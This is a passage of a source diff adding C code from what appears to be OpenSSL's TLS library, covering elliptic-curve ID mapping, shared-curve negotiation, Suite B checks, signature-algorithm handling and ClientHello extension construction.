+    0, 2,                       /* sect163r1 (2) */
+    0, 3,                       /* sect163r2 (3) */
+#  endif
+    0, 15,                      /* secp160k1 (15) */
+    0, 16,                      /* secp160r1 (16) */
+    0, 17,                      /* secp160r2 (17) */
+};
+# endif
+
+int tls1_ec_curve_id2nid(int curve_id)
+{
+    /* ECC curves from RFC 4492 and RFC 7027 */
+    if ((curve_id < 1) || ((unsigned int)curve_id >
+                           sizeof(nid_list) / sizeof(nid_list[0])))
+        return 0;
+    return nid_list[curve_id - 1];
+}
+
+int tls1_ec_nid2curve_id(int nid)
+{
+    /* ECC curves from RFC 4492 and RFC 7027 */
+    switch (nid) {
+    case NID_sect163k1:        /* sect163k1 (1) */
+        return 1;
+    case NID_sect163r1:        /* sect163r1 (2) */
+        return 2;
+    case NID_sect163r2:        /* sect163r2 (3) */
+        return 3;
+    case NID_sect193r1:        /* sect193r1 (4) */
+        return 4;
+    case NID_sect193r2:        /* sect193r2 (5) */
+        return 5;
+    case NID_sect233k1:        /* sect233k1 (6) */
+        return 6;
+    case NID_sect233r1:        /* sect233r1 (7) */
+        return 7;
+    case NID_sect239k1:        /* sect239k1 (8) */
+        return 8;
+    case NID_sect283k1:        /* sect283k1 (9) */
+        return 9;
+    case NID_sect283r1:        /* sect283r1 (10) */
+        return 10;
+    case NID_sect409k1:        /* sect409k1 (11) */
+        return 11;
+    case NID_sect409r1:        /* sect409r1 (12) */
+        return 12;
+    case NID_sect571k1:        /* sect571k1 (13) */
+        return 13;
+    case NID_sect571r1:        /* sect571r1 (14) */
+        return 14;
+    case NID_secp160k1:        /* secp160k1 (15) */
+        return 15;
+    case NID_secp160r1:        /* secp160r1 (16) */
+        return 16;
+    case NID_secp160r2:        /* secp160r2 (17) */
+        return 17;
+    case NID_secp192k1:        /* secp192k1 (18) */
+        return 18;
+    case NID_X9_62_prime192v1: /* secp192r1 (19) */
+        return 19;
+    case NID_secp224k1:        /* secp224k1 (20) */
+        return 20;
+    case NID_secp224r1:        /* secp224r1 (21) */
+        return 21;
+    case NID_secp256k1:        /* secp256k1 (22) */
+        return 22;
+    case NID_X9_62_prime256v1: /* secp256r1 (23) */
+        return 23;
+    case NID_secp384r1:        /* secp384r1 (24) */
+        return 24;
+    case NID_secp521r1:        /* secp521r1 (25) */
+        return 25;
+    case NID_brainpoolP256r1:  /* brainpoolP256r1 (26) */
+        return 26;
+    case NID_brainpoolP384r1:  /* brainpoolP384r1 (27) */
+        return 27;
+    case NID_brainpoolP512r1:  /* brainpool512r1 (28) */
+        return 28;
+    default:
+        return 0;
+    }
+}
+
+/*
+ * Get curves list, if "sess" is set return client curves otherwise
+ * preferred list.
+ * Sets |num_curves| to the number of curves in the list, i.e.,
+ * the length of |pcurves| is 2 * num_curves.
+ * Returns 1 on success and 0 if the client curves list has invalid format.
+ * The latter indicates an internal error: we should not be accepting such
+ * lists in the first place.
+ * TODO(emilia): we should really be storing the curves list in explicitly
+ * parsed form instead. (However, this would affect binary compatibility
+ * so cannot happen in the 1.0.x series.)
+ */
+static int tls1_get_curvelist(SSL *s, int sess,
+                              const unsigned char **pcurves,
+                              size_t *num_curves)
+{
+    size_t pcurveslen = 0;
+    if (sess) {
+        *pcurves = s->session->tlsext_ellipticcurvelist;
+        pcurveslen = s->session->tlsext_ellipticcurvelist_length;
+    } else {
+        /* For Suite B mode only include P-256, P-384 */
+        switch (tls1_suiteb(s)) {
+        case SSL_CERT_FLAG_SUITEB_128_LOS:
+            *pcurves = suiteb_curves;
+            pcurveslen = sizeof(suiteb_curves);
+            break;
+
+        case SSL_CERT_FLAG_SUITEB_128_LOS_ONLY:
+            *pcurves = suiteb_curves;
+            pcurveslen = 2;
+            break;
+
+        case SSL_CERT_FLAG_SUITEB_192_LOS:
+            *pcurves = suiteb_curves + 2;
+            pcurveslen = 2;
+            break;
+        default:
+            *pcurves = s->tlsext_ellipticcurvelist;
+            pcurveslen = s->tlsext_ellipticcurvelist_length;
+        }
+        if (!*pcurves) {
+# ifdef OPENSSL_FIPS
+            if (FIPS_mode()) {
+                *pcurves = fips_curves_default;
+                *pcurveslen = sizeof(fips_curves_default);
+            } else
+# endif
+            {
+                *pcurves = eccurves_default;
+                pcurveslen = sizeof(eccurves_default);
+            }
+        }
+    }
+    /* We do not allow odd length arrays to enter the system. */
+    if (pcurveslen & 1) {
+        SSLerr(SSL_F_TLS1_GET_CURVELIST, ERR_R_INTERNAL_ERROR);
+        *num_curves = 0;
+        return 0;
+    } else {
+        *num_curves = pcurveslen / 2;
+        return 1;
+    }
+}
+
+/* Check a curve is one of our preferences */
+int tls1_check_curve(SSL *s, const unsigned char *p, size_t len)
+{
+    const unsigned char *curves;
+    size_t num_curves, i;
+    unsigned int suiteb_flags = tls1_suiteb(s);
+    if (len != 3 || p[0] != NAMED_CURVE_TYPE)
+        return 0;
+    /* Check curve matches Suite B preferences */
+    if (suiteb_flags) {
+        unsigned long cid = s->s3->tmp.new_cipher->id;
+        if (p[1])
+            return 0;
+        if (cid == TLS1_CK_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256) {
+            if (p[2] != TLSEXT_curve_P_256)
+                return 0;
+        } else if (cid == TLS1_CK_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384) {
+            if (p[2] != TLSEXT_curve_P_384)
+                return 0;
+        } else                  /* Should never happen */
+            return 0;
+    }
+    if (!tls1_get_curvelist(s, 0, &curves, &num_curves))
+        return 0;
+    for (i = 0; i < num_curves; i++, curves += 2) {
+        if (p[1] == curves[0] && p[2] == curves[1])
+            return 1;
+    }
+    return 0;
+}
+
+/*-
+ * Return |nmatch|th shared curve or NID_undef if there is no match.
+ * For nmatch == -1, return number of  matches
+ * For nmatch == -2, return the NID of the curve to use for
+ * an EC tmp key, or NID_undef if there is no match.
+ */
+int tls1_shared_curve(SSL *s, int nmatch)
+{
+    const unsigned char *pref, *supp;
+    size_t num_pref, num_supp, i, j;
+    int k;
+    /* Can't do anything on client side */
+    if (s->server == 0)
+        return -1;
+    if (nmatch == -2) {
+        if (tls1_suiteb(s)) {
+            /*
+             * For Suite B ciphersuite determines curve: we already know
+             * these are acceptable due to previous checks.
+             */
+            unsigned long cid = s->s3->tmp.new_cipher->id;
+            if (cid == TLS1_CK_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256)
+                return NID_X9_62_prime256v1; /* P-256 */
+            if (cid == TLS1_CK_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384)
+                return NID_secp384r1; /* P-384 */
+            /* Should never happen */
+            return NID_undef;
+        }
+        /* If not Suite B just return first preference shared curve */
+        nmatch = 0;
+    }
+    /*
+     * Avoid truncation. tls1_get_curvelist takes an int
+     * but s->options is a long...
+     */
+    if (!tls1_get_curvelist
+        (s, (s->options & SSL_OP_CIPHER_SERVER_PREFERENCE) != 0, &supp,
+         &num_supp))
+        /* In practice, NID_undef == 0 but let's be precise. */
+        return nmatch == -1 ? 0 : NID_undef;
+    if (!tls1_get_curvelist
+        (s, !(s->options & SSL_OP_CIPHER_SERVER_PREFERENCE), &pref,
+         &num_pref))
+        return nmatch == -1 ? 0 : NID_undef;
+    k = 0;
+    for (i = 0; i < num_pref; i++, pref += 2) {
+        const unsigned char *tsupp = supp;
+        for (j = 0; j < num_supp; j++, tsupp += 2) {
+            if (pref[0] == tsupp[0] && pref[1] == tsupp[1]) {
+                if (nmatch == k) {
+                    int id = (pref[0] << 8) | pref[1];
+                    return tls1_ec_curve_id2nid(id);
+                }
+                k++;
+            }
+        }
+    }
+    if (nmatch == -1)
+        return k;
+    /* Out of range (nmatch > k). */
+    return NID_undef;
+}
+
+int tls1_set_curves(unsigned char **pext, size_t *pextlen,
+                    int *curves, size_t ncurves)
+{
+    unsigned char *clist, *p;
+    size_t i;
+    /*
+     * Bitmap of curves included to detect duplicates: only works while curve
+     * ids < 32
+     */
+    unsigned long dup_list = 0;
+# ifdef OPENSSL_NO_EC2M
+    EC_GROUP *curve;
+# endif
+
+    clist = OPENSSL_malloc(ncurves * 2);
+    if (!clist)
+        return 0;
+    for (i = 0, p = clist; i < ncurves; i++) {
+        unsigned long idmask;
+        int id;
+        id = tls1_ec_nid2curve_id(curves[i]);
+# ifdef OPENSSL_FIPS
+        /* NB: 25 is last curve ID supported by FIPS module */
+        if (FIPS_mode() && id > 25) {
+            OPENSSL_free(clist);
+            return 0;
+        }
+# endif
+# ifdef OPENSSL_NO_EC2M
+        curve = EC_GROUP_new_by_curve_name(curves[i]);
+        if (!curve || EC_METHOD_get_field_type(EC_GROUP_method_of(curve))
+            == NID_X9_62_characteristic_two_field) {
+            if (curve)
+                EC_GROUP_free(curve);
+            OPENSSL_free(clist);
+            return 0;
+        } else
+            EC_GROUP_free(curve);
+# endif
+        idmask = 1L << id;
+        if (!id || (dup_list & idmask)) {
+            OPENSSL_free(clist);
+            return 0;
+        }
+        dup_list |= idmask;
+        s2n(id, p);
+    }
+    if (*pext)
+        OPENSSL_free(*pext);
+    *pext = clist;
+    *pextlen = ncurves * 2;
+    return 1;
+}
+
+# define MAX_CURVELIST   28
+
+typedef struct {
+    size_t nidcnt;
+    int nid_arr[MAX_CURVELIST];
+} nid_cb_st;
+
+static int nid_cb(const char *elem, int len, void *arg)
+{
+    nid_cb_st *narg = arg;
+    size_t i;
+    int nid;
+    char etmp[20];
+    if (narg->nidcnt == MAX_CURVELIST)
+        return 0;
+    if (len > (int)(sizeof(etmp) - 1))
+        return 0;
+    memcpy(etmp, elem, len);
+    etmp[len] = 0;
+    nid = EC_curve_nist2nid(etmp);
+    if (nid == NID_undef)
+        nid = OBJ_sn2nid(etmp);
+    if (nid == NID_undef)
+        nid = OBJ_ln2nid(etmp);
+    if (nid == NID_undef)
+        return 0;
+    for (i = 0; i < narg->nidcnt; i++)
+        if (narg->nid_arr[i] == nid)
+            return 0;
+    narg->nid_arr[narg->nidcnt++] = nid;
+    return 1;
+}
+
+/* Set curves based on a colon separate list */
+int tls1_set_curves_list(unsigned char **pext, size_t *pextlen,
+                         const char *str)
+{
+    nid_cb_st ncb;
+    ncb.nidcnt = 0;
+    if (!CONF_parse_list(str, ':', 1, nid_cb, &ncb))
+        return 0;
+    if (pext == NULL)
+        return 1;
+    return tls1_set_curves(pext, pextlen, ncb.nid_arr, ncb.nidcnt);
+}
+
+/* For an EC key set TLS id and required compression based on parameters */
+static int tls1_set_ec_id(unsigned char *curve_id, unsigned char *comp_id,
+                          EC_KEY *ec)
+{
+    int is_prime, id;
+    const EC_GROUP *grp;
+    const EC_METHOD *meth;
+    if (!ec)
+        return 0;
+    /* Determine if it is a prime field */
+    grp = EC_KEY_get0_group(ec);
+    if (!grp)
+        return 0;
+    meth = EC_GROUP_method_of(grp);
+    if (!meth)
+        return 0;
+    if (EC_METHOD_get_field_type(meth) == NID_X9_62_prime_field)
+        is_prime = 1;
+    else
+        is_prime = 0;
+    /* Determine curve ID */
+    id = EC_GROUP_get_curve_name(grp);
+    id = tls1_ec_nid2curve_id(id);
+    /* If we have an ID set it, otherwise set arbitrary explicit curve */
+    if (id) {
+        curve_id[0] = 0;
+        curve_id[1] = (unsigned char)id;
+    } else {
+        curve_id[0] = 0xff;
+        if (is_prime)
+            curve_id[1] = 0x01;
+        else
+            curve_id[1] = 0x02;
+    }
+    if (comp_id) {
+        if (EC_KEY_get0_public_key(ec) == NULL)
+            return 0;
+        if (EC_KEY_get_conv_form(ec) == POINT_CONVERSION_COMPRESSED) {
+            if (is_prime)
+                *comp_id = TLSEXT_ECPOINTFORMAT_ansiX962_compressed_prime;
+            else
+                *comp_id = TLSEXT_ECPOINTFORMAT_ansiX962_compressed_char2;
+        } else
+            *comp_id = TLSEXT_ECPOINTFORMAT_uncompressed;
+    }
+    return 1;
+}
+
+/* Check an EC key is compatible with extensions */
+static int tls1_check_ec_key(SSL *s,
+                             unsigned char *curve_id, unsigned char *comp_id)
+{
+    const unsigned char *pformats, *pcurves;
+    size_t num_formats, num_curves, i;
+    int j;
+    /*
+     * If point formats extension present check it, otherwise everything is
+     * supported (see RFC4492).
+     */
+    if (comp_id && s->session->tlsext_ecpointformatlist) {
+        pformats = s->session->tlsext_ecpointformatlist;
+        num_formats = s->session->tlsext_ecpointformatlist_length;
+        for (i = 0; i < num_formats; i++, pformats++) {
+            if (*comp_id == *pformats)
+                break;
+        }
+        if (i == num_formats)
+            return 0;
+    }
+    if (!curve_id)
+        return 1;
+    /* Check curve is consistent with client and server preferences */
+    for (j = 0; j <= 1; j++) {
+        if (!tls1_get_curvelist(s, j, &pcurves, &num_curves))
+            return 0;
+        for (i = 0; i < num_curves; i++, pcurves += 2) {
+            if (pcurves[0] == curve_id[0] && pcurves[1] == curve_id[1])
+                break;
+        }
+        if (i == num_curves)
+            return 0;
+        /* For clients can only check sent curve list */
+        if (!s->server)
+            return 1;
+    }
+    return 1;
+}
+
+static void tls1_get_formatlist(SSL *s, const unsigned char **pformats,
+                                size_t *num_formats)
+{
+    /*
+     * If we have a custom point format list use it otherwise use default
+     */
+    if (s->tlsext_ecpointformatlist) {
+        *pformats = s->tlsext_ecpointformatlist;
+        *num_formats = s->tlsext_ecpointformatlist_length;
+    } else {
+        *pformats = ecformats_default;
+        /* For Suite B we don't support char2 fields */
+        if (tls1_suiteb(s))
+            *num_formats = sizeof(ecformats_default) - 1;
+        else
+            *num_formats = sizeof(ecformats_default);
+    }
+}
+
+/*
+ * Check cert parameters compatible with extensions: currently just checks EC
+ * certificates have compatible curves and compression.
+ */
+static int tls1_check_cert_param(SSL *s, X509 *x, int set_ee_md)
+{
+    unsigned char comp_id, curve_id[2];
+    EVP_PKEY *pkey;
+    int rv;
+    pkey = X509_get_pubkey(x);
+    if (!pkey)
+        return 0;
+    /* If not EC nothing to do */
+    if (pkey->type != EVP_PKEY_EC) {
+        EVP_PKEY_free(pkey);
+        return 1;
+    }
+    rv = tls1_set_ec_id(curve_id, &comp_id, pkey->pkey.ec);
+    EVP_PKEY_free(pkey);
+    if (!rv)
+        return 0;
+    /*
+     * Can't check curve_id for client certs as we don't have a supported
+     * curves extension.
+     */
+    rv = tls1_check_ec_key(s, s->server ? curve_id : NULL, &comp_id);
+    if (!rv)
+        return 0;
+    /*
+     * Special case for suite B. We *MUST* sign using SHA256+P-256 or
+     * SHA384+P-384, adjust digest if necessary.
+     */
+    if (set_ee_md && tls1_suiteb(s)) {
+        int check_md;
+        size_t i;
+        CERT *c = s->cert;
+        if (curve_id[0])
+            return 0;
+        /* Check to see we have necessary signing algorithm */
+        if (curve_id[1] == TLSEXT_curve_P_256)
+            check_md = NID_ecdsa_with_SHA256;
+        else if (curve_id[1] == TLSEXT_curve_P_384)
+            check_md = NID_ecdsa_with_SHA384;
+        else
+            return 0;           /* Should never happen */
+        for (i = 0; i < c->shared_sigalgslen; i++)
+            if (check_md == c->shared_sigalgs[i].signandhash_nid)
+                break;
+        if (i == c->shared_sigalgslen)
+            return 0;
+        if (set_ee_md == 2) {
+            if (check_md == NID_ecdsa_with_SHA256)
+                c->pkeys[SSL_PKEY_ECC].digest = EVP_sha256();
+            else
+                c->pkeys[SSL_PKEY_ECC].digest = EVP_sha384();
+        }
+    }
+    return rv;
+}
+
+# ifndef OPENSSL_NO_ECDH
+/* Check EC temporary key is compatible with client extensions */
+int tls1_check_ec_tmp_key(SSL *s, unsigned long cid)
+{
+    unsigned char curve_id[2];
+    EC_KEY *ec = s->cert->ecdh_tmp;
+#  ifdef OPENSSL_SSL_DEBUG_BROKEN_PROTOCOL
+    /* Allow any curve: not just those peer supports */
+    if (s->cert->cert_flags & SSL_CERT_FLAG_BROKEN_PROTOCOL)
+        return 1;
+#  endif
+    /*
+     * If Suite B, AES128 MUST use P-256 and AES256 MUST use P-384, no other
+     * curves permitted.
+     */
+    if (tls1_suiteb(s)) {
+        /* Curve to check determined by ciphersuite */
+        if (cid == TLS1_CK_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256)
+            curve_id[1] = TLSEXT_curve_P_256;
+        else if (cid == TLS1_CK_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384)
+            curve_id[1] = TLSEXT_curve_P_384;
+        else
+            return 0;
+        curve_id[0] = 0;
+        /* Check this curve is acceptable */
+        if (!tls1_check_ec_key(s, curve_id, NULL))
+            return 0;
+        /* If auto or setting curve from callback assume OK */
+        if (s->cert->ecdh_tmp_auto || s->cert->ecdh_tmp_cb)
+            return 1;
+        /* Otherwise check curve is acceptable */
+        else {
+            unsigned char curve_tmp[2];
+            if (!ec)
+                return 0;
+            if (!tls1_set_ec_id(curve_tmp, NULL, ec))
+                return 0;
+            if (!curve_tmp[0] || curve_tmp[1] == curve_id[1])
+                return 1;
+            return 0;
+        }
+
+    }
+    if (s->cert->ecdh_tmp_auto) {
+        /* Need a shared curve */
+        if (tls1_shared_curve(s, 0))
+            return 1;
+        else
+            return 0;
+    }
+    if (!ec) {
+        if (s->cert->ecdh_tmp_cb)
+            return 1;
+        else
+            return 0;
+    }
+    if (!tls1_set_ec_id(curve_id, NULL, ec))
+        return 0;
+/* Set this to allow use of invalid curves for testing */
+#  if 0
+    return 1;
+#  else
+    return tls1_check_ec_key(s, curve_id, NULL);
+#  endif
+}
+# endif                         /* OPENSSL_NO_ECDH */
+
+#else
+
+static int tls1_check_cert_param(SSL *s, X509 *x, int set_ee_md)
+{
+    return 1;
+}
+
+#endif                          /* OPENSSL_NO_EC */
+
+#ifndef OPENSSL_NO_TLSEXT
+
+/*
+ * List of supported signature algorithms and hashes. Should make this
+ * customisable at some point, for now include everything we support.
+ */
+
+# ifdef OPENSSL_NO_RSA
+#  define tlsext_sigalg_rsa(md) /* */
+# else
+#  define tlsext_sigalg_rsa(md) md, TLSEXT_signature_rsa,
+# endif
+
+# ifdef OPENSSL_NO_DSA
+#  define tlsext_sigalg_dsa(md) /* */
+# else
+#  define tlsext_sigalg_dsa(md) md, TLSEXT_signature_dsa,
+# endif
+
+# ifdef OPENSSL_NO_ECDSA
+#  define tlsext_sigalg_ecdsa(md)
+                                /* */
+# else
+#  define tlsext_sigalg_ecdsa(md) md, TLSEXT_signature_ecdsa,
+# endif
+
+# define tlsext_sigalg(md) \
+                tlsext_sigalg_rsa(md) \
+                tlsext_sigalg_dsa(md) \
+                tlsext_sigalg_ecdsa(md)
+
+static unsigned char tls12_sigalgs[] = {
+# ifndef OPENSSL_NO_SHA512
+    tlsext_sigalg(TLSEXT_hash_sha512)
+        tlsext_sigalg(TLSEXT_hash_sha384)
+# endif
+# ifndef OPENSSL_NO_SHA256
+        tlsext_sigalg(TLSEXT_hash_sha256)
+        tlsext_sigalg(TLSEXT_hash_sha224)
+# endif
+# ifndef OPENSSL_NO_SHA
+        tlsext_sigalg(TLSEXT_hash_sha1)
+# endif
+};
+
+# ifndef OPENSSL_NO_ECDSA
+static unsigned char suiteb_sigalgs[] = {
+    tlsext_sigalg_ecdsa(TLSEXT_hash_sha256)
+        tlsext_sigalg_ecdsa(TLSEXT_hash_sha384)
+};
+# endif
+size_t tls12_get_psigalgs(SSL *s, const unsigned char **psigs)
+{
+    /*
+     * If Suite B mode use Suite B sigalgs only, ignore any other
+     * preferences.
+     */
+# ifndef OPENSSL_NO_EC
+    switch (tls1_suiteb(s)) {
+    case SSL_CERT_FLAG_SUITEB_128_LOS:
+        *psigs = suiteb_sigalgs;
+        return sizeof(suiteb_sigalgs);
+
+    case SSL_CERT_FLAG_SUITEB_128_LOS_ONLY:
+        *psigs = suiteb_sigalgs;
+        return 2;
+
+    case SSL_CERT_FLAG_SUITEB_192_LOS:
+        *psigs = suiteb_sigalgs + 2;
+        return 2;
+    }
+# endif
+    /* If server use client authentication sigalgs if not NULL */
+    if (s->server && s->cert->client_sigalgs) {
+        *psigs = s->cert->client_sigalgs;
+        return s->cert->client_sigalgslen;
+    } else if (s->cert->conf_sigalgs) {
+        *psigs = s->cert->conf_sigalgs;
+        return s->cert->conf_sigalgslen;
+    } else {
+        *psigs = tls12_sigalgs;
+        return sizeof(tls12_sigalgs);
+    }
+}
+
+/*
+ * Check signature algorithm is consistent with sent supported signature
+ * algorithms and if so return relevant digest.
+ */
+int tls12_check_peer_sigalg(const EVP_MD **pmd, SSL *s,
+                            const unsigned char *sig, EVP_PKEY *pkey)
+{
+    const unsigned char *sent_sigs;
+    size_t sent_sigslen, i;
+    int sigalg = tls12_get_sigid(pkey);
+    /* Should never happen */
+    if (sigalg == -1)
+        return -1;
+    /* Check key type is consistent with signature */
+    if (sigalg != (int)sig[1]) {
+        SSLerr(SSL_F_TLS12_CHECK_PEER_SIGALG, SSL_R_WRONG_SIGNATURE_TYPE);
+        return 0;
+    }
+# ifndef OPENSSL_NO_EC
+    if (pkey->type == EVP_PKEY_EC) {
+        unsigned char curve_id[2], comp_id;
+        /* Check compression and curve matches extensions */
+        if (!tls1_set_ec_id(curve_id, &comp_id, pkey->pkey.ec))
+            return 0;
+        if (!s->server && !tls1_check_ec_key(s, curve_id, &comp_id)) {
+            SSLerr(SSL_F_TLS12_CHECK_PEER_SIGALG, SSL_R_WRONG_CURVE);
+            return 0;
+        }
+        /* If Suite B only P-384+SHA384 or P-256+SHA-256 allowed */
+        if (tls1_suiteb(s)) {
+            if (curve_id[0])
+                return 0;
+            if (curve_id[1] == TLSEXT_curve_P_256) {
+                if (sig[0] != TLSEXT_hash_sha256) {
+                    SSLerr(SSL_F_TLS12_CHECK_PEER_SIGALG,
+                           SSL_R_ILLEGAL_SUITEB_DIGEST);
+                    return 0;
+                }
+            } else if (curve_id[1] == TLSEXT_curve_P_384) {
+                if (sig[0] != TLSEXT_hash_sha384) {
+                    SSLerr(SSL_F_TLS12_CHECK_PEER_SIGALG,
+                           SSL_R_ILLEGAL_SUITEB_DIGEST);
+                    return 0;
+                }
+            } else
+                return 0;
+        }
+    } else if (tls1_suiteb(s))
+        return 0;
+# endif
+
+    /* Check signature matches a type we sent */
+    sent_sigslen = tls12_get_psigalgs(s, &sent_sigs);
+    for (i = 0; i < sent_sigslen; i += 2, sent_sigs += 2) {
+        if (sig[0] == sent_sigs[0] && sig[1] == sent_sigs[1])
+            break;
+    }
+    /* Allow fallback to SHA1 if not strict mode */
+    if (i == sent_sigslen
+        && (sig[0] != TLSEXT_hash_sha1
+            || s->cert->cert_flags & SSL_CERT_FLAGS_CHECK_TLS_STRICT)) {
+        SSLerr(SSL_F_TLS12_CHECK_PEER_SIGALG, SSL_R_WRONG_SIGNATURE_TYPE);
+        return 0;
+    }
+    *pmd = tls12_get_hash(sig[0]);
+    if (*pmd == NULL) {
+        SSLerr(SSL_F_TLS12_CHECK_PEER_SIGALG, SSL_R_UNKNOWN_DIGEST);
+        return 0;
+    }
+    /*
+     * Store the digest used so applications can retrieve it if they wish.
+     */
+    if (s->session && s->session->sess_cert)
+        s->session->sess_cert->peer_key->digest = *pmd;
+    return 1;
+}
+
+/*
+ * Get a mask of disabled algorithms: an algorithm is disabled if it isn't
+ * supported or doesn't appear in supported signature algorithms. Unlike
+ * ssl_cipher_get_disabled this applies to a specific session and not global
+ * settings.
+ */
+void ssl_set_client_disabled(SSL *s)
+{
+    CERT *c = s->cert;
+    const unsigned char *sigalgs;
+    size_t i, sigalgslen;
+    int have_rsa = 0, have_dsa = 0, have_ecdsa = 0;
+    c->mask_a = 0;
+    c->mask_k = 0;
+    /* Don't allow TLS 1.2 only ciphers if we don't suppport them */
+    if (!SSL_CLIENT_USE_TLS1_2_CIPHERS(s))
+        c->mask_ssl = SSL_TLSV1_2;
+    else
+        c->mask_ssl = 0;
+    /*
+     * Now go through all signature algorithms seeing if we support any for
+     * RSA, DSA, ECDSA. Do this for all versions not just TLS 1.2.
+     */
+    sigalgslen = tls12_get_psigalgs(s, &sigalgs);
+    for (i = 0; i < sigalgslen; i += 2, sigalgs += 2) {
+        switch (sigalgs[1]) {
+# ifndef OPENSSL_NO_RSA
+        case TLSEXT_signature_rsa:
+            have_rsa = 1;
+            break;
+# endif
+# ifndef OPENSSL_NO_DSA
+        case TLSEXT_signature_dsa:
+            have_dsa = 1;
+            break;
+# endif
+# ifndef OPENSSL_NO_ECDSA
+        case TLSEXT_signature_ecdsa:
+            have_ecdsa = 1;
+            break;
+# endif
+        }
+    }
+    /*
+     * Disable auth and static DH if we don't include any appropriate
+     * signature algorithms.
+     */
+    if (!have_rsa) {
+        c->mask_a |= SSL_aRSA;
+        c->mask_k |= SSL_kDHr | SSL_kECDHr;
+    }
+    if (!have_dsa) {
+        c->mask_a |= SSL_aDSS;
+        c->mask_k |= SSL_kDHd;
+    }
+    if (!have_ecdsa) {
+        c->mask_a |= SSL_aECDSA;
+        c->mask_k |= SSL_kECDHe;
+    }
+# ifndef OPENSSL_NO_KRB5
+    if (!kssl_tgt_is_available(s->kssl_ctx)) {
+        c->mask_a |= SSL_aKRB5;
+        c->mask_k |= SSL_kKRB5;
+    }
+# endif
+# ifndef OPENSSL_NO_PSK
+    /* with PSK there must be client callback set */
+    if (!s->psk_client_callback) {
+        c->mask_a |= SSL_aPSK;
+        c->mask_k |= SSL_kPSK;
+    }
+# endif                         /* OPENSSL_NO_PSK */
+# ifndef OPENSSL_NO_SRP
+    if (!(s->srp_ctx.srp_Mask & SSL_kSRP)) {
+        c->mask_a |= SSL_aSRP;
+        c->mask_k |= SSL_kSRP;
+    }
+# endif
+    c->valid = 1;
+}
+
+unsigned char *ssl_add_clienthello_tlsext(SSL *s, unsigned char *buf,
+                                          unsigned char *limit, int *al)
+{
+    int extdatalen = 0;
+    unsigned char *orig = buf;
+    unsigned char *ret = buf;
+# ifndef OPENSSL_NO_EC
+    /* See if we support any ECC ciphersuites */
+    int using_ecc = 0;
+    if (s->version >= TLS1_VERSION || SSL_IS_DTLS(s)) {
+        int i;
+        unsigned long alg_k, alg_a;
+        STACK_OF(SSL_CIPHER) *cipher_stack = SSL_get_ciphers(s);
+
+        for (i = 0; i < sk_SSL_CIPHER_num(cipher_stack); i++) {
+            SSL_CIPHER *c = sk_SSL_CIPHER_value(cipher_stack, i);
+
+            alg_k = c->algorithm_mkey;
+            alg_a = c->algorithm_auth;
+            if ((alg_k & (SSL_kEECDH | SSL_kECDHr | SSL_kECDHe)
+                 || (alg_a & SSL_aECDSA))) {
+                using_ecc = 1;
+                break;
+            }
+        }
+    }
+# endif
+
+    /* don't add extensions for SSLv3 unless doing secure renegotiation */
+    if (s->client_version == SSL3_VERSION && !s->s3->send_connection_binding)
+        return orig;
+
+    ret += 2;
+
+    if (ret >= limit)
+        return NULL;            /* this really never occurs, but ... */
+
+    if (s->tlsext_hostname != NULL) {
+        /* Add TLS extension servername to the Client Hello message */
+        unsigned long size_str;
+        long lenmax;
+
+        /*-
+         * check for enough space.
+         * 4 for the servername type and entension length
+         * 2 for servernamelist length
+         * 1 for the hostname type
+         * 2 for hostname length
+         * + hostname length
+         */
+
+        if ((lenmax = limit - ret - 9) < 0
+            || (size_str =
+                strlen(s->tlsext_hostname)) > (unsigned long)lenmax)
+            return NULL;
+
+        /* extension type and length */
+        s2n(TLSEXT_TYPE_server_name, ret);
+        s2n(size_str + 5, ret);
+
+        /* length of servername list */
+        s2n(size_str + 3, ret);
+
+        /* hostname type, length and hostname */
+        *(ret++) = (unsigned char)TLSEXT_NAMETYPE_host_name;
+        s2n(size_str, ret);
+        memcpy(ret, s->tlsext_hostname, size_str);
+        ret += size_str;
+    }
+
+    /* Add RI if renegotiating */
+    if (s->renegotiate) {
+        int el;
+
+        if (!ssl_add_clienthello_renegotiate_ext(s, 0, &el, 0)) {
+            SSLerr(SSL_F_SSL_ADD_CLIENTHELLO_TLSEXT, ERR_R_INTERNAL_ERROR);
+            return NULL;
+        }
+
+        if ((limit - ret - 4 - el) < 0)
+            return NULL;
+
+        s2n(TLSEXT_TYPE_renegotiate, ret);
+        s2n(el, ret);
+
+        if (!ssl_add_clienthello_renegotiate_ext(s, ret, &el, el)) {
+            SSLerr(SSL_F_SSL_ADD_CLIENTHELLO_TLSEXT, ERR_R_INTERNAL_ERROR);
+            return NULL;
+        }
+
+        ret += el;
+    }
+# ifndef OPENSSL_NO_SRP
+    /* Add SRP username if there is one */
+    if (s->srp_ctx.login != NULL) { /* Add TLS extension SRP username to the
+                                     * Client Hello message */
+
+        int login_len = strlen(s->srp_ctx.login);
+        if (login_len > 255 || login_len == 0) {
+            SSLerr(SSL_F_SSL_ADD_CLIENTHELLO_TLSEXT, ERR_R_INTERNAL_ERROR);
+            return NULL;
+        }
+
+        /*-
+         * check for enough space.
+         * 4 for the srp type type and entension length
+         * 1 for the srp user identity
+         * + srp user identity length
+         */
+        if ((limit - ret - 5 - login_len) < 0)
+            return NULL;
+
+        /* fill in the extension */
+        s2n(TLSEXT_TYPE_srp, ret);
+        s2n(login_len + 1, ret);
+        (*ret++) = (unsigned char)login_len;
+        memcpy(ret, s->srp_ctx.login, login_len);
+        ret += login_len;
+    }
+# endif
+
+# ifndef OPENSSL_NO_EC
+    if (using_ecc) {
+        /*
+         * Add TLS extension ECPointFormats to the ClientHello message
+         */
+        long lenmax;
+        const unsigned char *pcurves, *pformats;
+        size_t num_curves, num_formats, curves_list_len;
+
+        tls1_get_formatlist(s, &pformats, &num_formats);
+
+        if ((lenmax = limit - ret - 5) < 0)
+            return NULL;
+        if (num_formats > (size_t)lenmax)
+            return NULL;
+        if (num_formats > 255) {
+            SSLerr(SSL_F_SSL_ADD_CLIENTHELLO_TLSEXT, ERR_R_INTERNAL_ERROR);
+            return NULL;
+        }
+
+        s2n(TLSEXT_TYPE_ec_point_formats, ret);
+        /* The point format list has 1-byte length. */
+        s2n(num_formats + 1, ret);
+        *(ret++) = (unsigned char)num_formats;
+        memcpy(ret, pformats, num_formats);
+        ret += num_formats;
+
+        /*
+         * Add TLS extension EllipticCurves to the ClientHello message
+         */
